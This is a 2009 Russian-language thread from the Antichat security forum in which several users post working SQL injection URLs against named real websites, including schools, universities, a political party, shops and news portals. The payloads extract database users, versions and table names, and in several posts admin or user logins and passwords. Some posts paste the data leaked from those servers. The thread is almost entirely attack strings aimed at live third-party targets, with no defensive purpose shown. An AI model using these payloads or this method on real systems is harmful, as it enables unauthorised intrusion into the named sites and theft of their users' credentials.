ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10221  
Старый 22.07.2009, 09:42
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://www.liceocastilla.edu.sv/vista_galeria.php?id=1'+union+select+1,2,3,concat_ Ws(0x3a,user(),database(),version()),5,6/*

liceocas@host20.digitalvalley.com:liceocastilla_ed u_sv_colegio:5.0.45
 
Ответить с цитированием

  #10222  
Старый 22.07.2009, 13:26
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

обеденный пиррифф..
Цитата:
http://athletics.carrollu.edu/news_detail.asp?newsid=-2582+union+select+1,2,3,username,password,6,7,8+fr om+cms.cmsuser/*
Version: 5.0.22-community-nt
User: web@localhost
Dbname: athletics

file_priv=Y

=)
 
Ответить с цитированием

  #10223  
Старый 22.07.2009, 14:35
aciiiD
Новичок
Регистрация: 26.01.2009
Сообщений: 13
Провел на форуме:
86417

Репутация: -17
По умолчанию

Код:
ell.kz/index.php?id=2&target=163 and ascii(substring(user(),4,1))<95
Вот что поканабрал : DHT
Код:
http://sotovikcity.ru/phone.php?ID=-1+union+select+1,concat_WS(0x3a,name,password),3+from+auth--
Код:
http://cifravoz.ru/views3.php?id=-173+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables--
Код:
http://msmobiles.com/mobile/news.php?id=-1+union+select+1,2,unhex(hex(group_concat(concat_WS(0x3a,rus_login,rus_password)))),4,5,6,7,8,9,10,11,12,13,14,15+from+msmo_registered_users--
Код:
http://classifieds.bechna.com/view_sale_details.php?id=-1+union+select+pass,2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+admin--&city=Delhi
Код:
http://www.chat.hcgomel.com/news.php?ID=-311+union+select+1,2,3,unhex(hex(concat_ws(0x3a,username,user_password,user_icq))),5,6,7,8+from+phpbb_users+limit+0,1--

Последний раз редактировалось jokester; 22.07.2009 в 21:53.. Причина: chiangmainews.com БОЯН
 
Ответить с цитированием

  #10224  
Старый 22.07.2009, 20:34
Bramin
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199

Репутация: 127
Отправить сообщение для Bramin с помощью ICQ
По умолчанию

Код HTML:
http://www.pioner.su/news.php?id=-30+union+select+1,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),3--
4.1.22-log:allianc0_@localhost:allianc0_ortbld-freebsd6.1

Код HTML:
http://www.rstd.ru/news.php?id=-30+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6--
5.0.67-log:u145464_2:u145464@10.10.153.183

Код HTML:
http://www.tviphilippines.com/article.php?id=-21+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14--
5.0.81-community-log:tviphili_tviphil@localhost:tviphili_tviphils

Код HTML:
http://www.kotogoto.com/article.php?id=21+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6--
5.0.24a-Debian_2.dotdeb.0-log:db25283:db25283@localhost

Код HTML:
http://www.grp-s.ru/article.php?id=-21+union+select+concat_ws(0x3a,version(),user(),version(),database()),2,3,4--
5.0.67-log:grpsgrp_grps@localhost:5.0.67-log:grpsgrp_grps

Код HTML:
http://dev.onlinedrummer.com/article.php?id=-21+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14--
5.0.45-communityldpublic@localhost:SiteFeatures

Код HTML:
http://developpement-durable.ujjef.com/point.php?id=4+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables--
Код HTML:
http://www.golfdirect.co.za/golf.php?id=-4+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9--
5.0.81-community:wwwgolf_golfdirect:wwwgolf_golfd@localho st

Последний раз редактировалось Bramin; 22.07.2009 в 23:42..
 
Ответить с цитированием

  #10225  
Старый 22.07.2009, 23:36
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://www.ort.be/ortsite/index.php?nid=-134+union+select+1,concat_ws(0x3a,database(),user( ),version()),3,4,5,6,7,8,9,10--

ORTWEBSITE:HY_ORTWEBSITE@LOCALHOST:4.1.22-COMMUNITY-NT

####################################
Харьковский национальный университет радиоэлектроники Кафедра основ радиотехники

http://ort.kture.kharkov.ua/prepod.php?type=view&id=-1'+union+select+1,concat_Ws(0x3a,database(),user() ,version()),3,4,5,6,7,8,9/*

siteprom_ort:siteprom_ort@ws10.kture.itl.net.ua:4. 1.22-standard-log

####################################
http://www.pnp.de/nachrichten/kommunalwahl08/ort.php?id=-1+union+select+1,concat_Ws(0x3a,user(),database(), version()),3,4,5,6,7--

PNP@HTTP.VGP.DE:KOMMUNALWAHL_2008:5.1.34-LOG

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
http://www.chorverband-ekhn.de/fcnd/showobject.php?art=ort&id=-1+union+select+concat_Ws(0x3a,database(),user(),ve rsion())--

Ort: db230516389:dbo230516389@212.227.29.9:4.0.27-max-log

Последний раз редактировалось HAXTA4OK; 23.07.2009 в 00:05..
 
Ответить с цитированием

  #10226  
Старый 23.07.2009, 03:27
aciiiD
Новичок
Регистрация: 26.01.2009
Сообщений: 13
Провел на форуме:
86417

Репутация: -17
По умолчанию

Код:
http://www.thewest.cz/portal/clanek_cely.php?id=-12+union+select+1,2,3,4,5,concat_ws(0x3a,user()),7,8,9,10,11,12,13+from+users--
Код:
http://billiard4u.ru/faq/faq.php?id=-1+union+select+1,2,concat_WS(0x3a,password,login),4,5,6+from+user--
Код:
http://www.cartell.ru/faq.php?id=-13+union+select+1,2,group_concat(table_name),4+from+information_schema.tables--
Код:
http://www.sky-radio.fm/sreda/print.php?sid=-1+union+select+1,2,concat_ws(0x3a,user_name,user_password),4,5,6+from+fphotos_users+limit+0,1--

Последний раз редактировалось jokester; 23.07.2009 в 11:07.. Причина: breakdance.ru sotovikm.ru БОЯНы
 
Ответить с цитированием

  #10227  
Старый 23.07.2009, 06:57
molotovkeyt
Новичок
Регистрация: 02.11.2008
Сообщений: 25
Провел на форуме:
147543

Репутация: 55
По умолчанию

Мего-дизайнерская контора "Пиментос" со своим дырявым сайтом.

http://pimentos.com.ua/?mid=15&action=news_detail&new_id=-74+union+select+1,2,version%28%29,4,5,6,7,8,9,0,1, 2,3,14--

В разделе "Наши работы" примерно 90% из почти 60 сайтов имеют sql inj.
У всех базы 5-ой ветки.

Самые интресные из них:

Оффициальный сайт украинской партии "Реформы и порядок"

http://www.prp.org.ua/index.php?mid=15&action=posit_full&id=-56+union+select+1,version%28%29,3,4,5,6,7,8,9,0,1--

Сайт всеукраинского журнала "Стройся!"
http://www.strojsya.kiev.ua/?mid=4&action=price_list&rubric_id=-3521+union+select+1,2,3,version%28%29,5,6--

Последний раз редактировалось jokester; 23.07.2009 в 11:02.. Причина: usdp.kiev.ua avtozazbank.com agrocombank.kiev.ua БОЯНы
 
Ответить с цитированием

  #10228  
Старый 23.07.2009, 12:48
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://pfarre.deutschwagram.com/Ort.php?ID=1+union+select+1,concat_ws(0x3a,user(), database(),version()),3,4,5--

pfarre@localhostfarre:5.0.22-Debian_0ubuntu6.06.10-log
 
Ответить с цитированием

  #10229  
Старый 23.07.2009, 15:19
Staratel
Познающий
Регистрация: 03.02.2009
Сообщений: 32
Провел на форуме:
326183

Репутация: 18
По умолчанию

http://www.air-bed.ru/cover.php?name=compare&id_groups=1'+union+select+u nhex(hex(version()))/*

http://www.air-bed.ru/cover.php?name=compare&id_groups=1'+union+select+p assword+from+users/*

Последний раз редактировалось jokester; 23.07.2009 в 16:08.. Причина: Вопросы в соседней теме
 
Ответить с цитированием

  #10230  
Старый 23.07.2009, 18:44
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079

Репутация: 90
По умолчанию

http://www.brettex.com.ua/index.php?dir=oblad&page=oblad&dev=35'+union+selec t+1,concat_ws(0x3a,user(),version(),database()),3, 4,5,6,7,8--+
Цитата:
User: u_brettex@localhost
Version: 4.1.22-log
DB: brettex
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 21 (пользователей: 0 , гостей: 21)
 


Быстрый переход




ANTICHAT.XYZ